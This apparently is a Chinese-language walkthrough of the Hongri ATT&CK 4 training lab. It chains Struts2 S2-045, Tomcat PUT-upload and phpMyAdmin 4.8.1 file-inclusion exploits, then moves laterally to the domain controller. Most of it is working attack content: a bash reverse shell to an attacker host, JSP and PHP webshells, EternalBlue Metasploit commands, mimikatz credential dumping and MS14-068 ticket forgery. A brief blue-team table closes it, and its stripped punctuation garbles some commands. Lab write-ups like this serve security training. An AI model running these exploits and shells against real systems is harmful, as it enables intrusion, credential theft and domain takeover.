ATTCK 红日4靶场:3种漏洞组合利用与4步内网横向移动实战

发布时间:2026/7/13 6:47:53
ATTCK 红日4靶场:3种漏洞组合利用与4步内网横向移动实战
ATTCK红日4靶场实战多漏洞组合利用与内网横向渗透全解析当安全工程师从靶场训练迈向真实攻防战场时最关键的跨越在于理解攻击链路的完整性和技术选择的战术思维。红日安全团队推出的ATTCK系列靶场正是模拟企业内网环境的绝佳训练平台。本文将深入剖析红日4靶场中Struts2、Tomcat、phpMyAdmin三大漏洞的组合利用以及从外网突破到域控拿下的四步横向移动实战过程。1. 靶场环境与攻击路径总览红日4靶场构建了一个典型的DMZ内网域环境架构包含以下关键节点Ubuntu主机192.168.93.136暴露SSH22和三个Web服务端口2001-2003内网域环境Win7域成员机器192.168.75.130域控制器DC192.168.75.132攻击路径可抽象为以下阶段graph TD A[外网信息收集] -- B[Struts2漏洞利用] A -- C[Tomcat漏洞利用] A -- D[phpMyAdmin漏洞利用] B -- E[初始立足点获取] C -- E D -- E E -- F[Docker逃逸] F -- G[内网探测] G -- H[横向移动] H -- I[域控接管]2. 外网突破口三漏洞组合拳2.1 Struts2-045远程代码执行2001端口运行的Struts2框架存在经典漏洞S2-045CVE-2017-5638攻击步骤如下漏洞检测python struts-pwn.py -u http://192.168.93.136:2001反弹Shell执行# 攻击机监听 nc -lvp 4444 # 利用漏洞执行 python struts-pwn.py -u http://192.168.93.136:2001 -c bash -i /dev/tcp/192.168.93.130/4444 01注意实际攻击中建议使用编码后的payload避免特殊字符问题2.2 Tomcat CVE-2017-12615漏洞利用2002端口的Tomcat服务存在PUT方法上传漏洞漏洞验证nikto -h http://192.168.93.136:2002Webshell上传PUT /shell.jsp/ HTTP/1.1 Host: 192.168.93.136:2002 Content-Type: text/jsp Content-Length: 25 % Runtime.getRuntime().exec(request.getParameter(cmd)); %权限维持# 转换为交互式shell python -c import pty; pty.spawn(/bin/bash)2.3 phpMyAdmin 4.8.1文件包含漏洞2003端口的phpMyAdmin存在CVE-2018-12613漏洞验证http://192.168.93.136:2003/?targettbl_zoom_select.php?/../../../../../../etc/passwdSession文件Getshell-- 创建测试表 CREATE TABLE test.shell (data TEXT NOT NULL ); -- 插入PHP代码 INSERT INTO test.shell (data) VALUES (?php system($_GET[cmd]); ?); -- 获取session文件路径 SELECT global.tmpdir;执行系统命令http://192.168.93.136:2003/?targettbl_zoom_select.php?/../../../../../../tmp/sess_[SESSION_ID]cmdid3. 内网横向移动四步法3.1 第一步信息收集与隧道建立获取初始shell后首先进行环境认知# 检查Docker环境 ls -alh /.dockerenv cat /proc/1/cgroup # 发现内网网段 ip a | grep -oP 192.168.75.\d # 建立SOCKS隧道以frp为例 # 靶机执行 ./frpc -c frpc.ini # 配置文件包含server_addr攻击机IP # 攻击机配置 [common] bind_port 70003.2 第二步内网主机探测通过Metasploit进行内网扫描msf6 use auxiliary/scanner/portscan/tcp msf6 set RHOSTS 192.168.75.0/24 msf6 set PORTS 445,3389,5985 msf6 set PROXIES socks5:攻击机IP:1080 msf6 run关键发现192.168.75.130Win7开放445/SMB192.168.75.132DC开放53/DNS3.3 第三步漏洞利用与权限提升针对Win7主机的攻击流程MS17-010漏洞检测msf6 use auxiliary/scanner/smb/smb_ms17_010 msf6 set RHOSTS 192.168.75.130 msf6 run永恒之蓝攻击msf6 use exploit/windows/smb/ms17_010_eternalblue msf6 set RHOST 192.168.75.130 msf6 set PAYLOAD windows/x64/meterpreter/bind_tcp msf6 run获取域用户凭证mimikatz.exe sekurlsa::logonpasswords输出示例Username : douser Domain : DEMO Password : Dotest1233.4 第四步域控接管与黄金票据利用MS14-068进行域提权生成伪造票据MS14-068.exe -u douserDEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.75.132 -p Dotest123注入黄金票据mimikatz # kerberos::purge mimikatz # kerberos::ptc TGT_douserDEMO.com.ccache验证域控访问dir \\WIN-ENS2VR5TR3N\c$4. 防御视角的思考与加固建议从蓝队角度分析攻击路径中的关键防御点攻击阶段防御措施检测方法初始访问Web应用WAF策略Struts2异常请求日志分析执行命令执行白名单非交互式shell行为检测权限提升及时修补MS17-010SMB异常流量监测横向移动网络分段主机防火墙Kerberos异常票据检测持久化定期审计域控权限黄金票据使用检测实战经验分享在一次真实渗透测试中我们发现虽然MS17-010补丁已安装但系统未重启导致补丁未生效。这种假修补情况在内网中尤为常见建议蓝队不仅要关注补丁安装更要验证实际防护状态。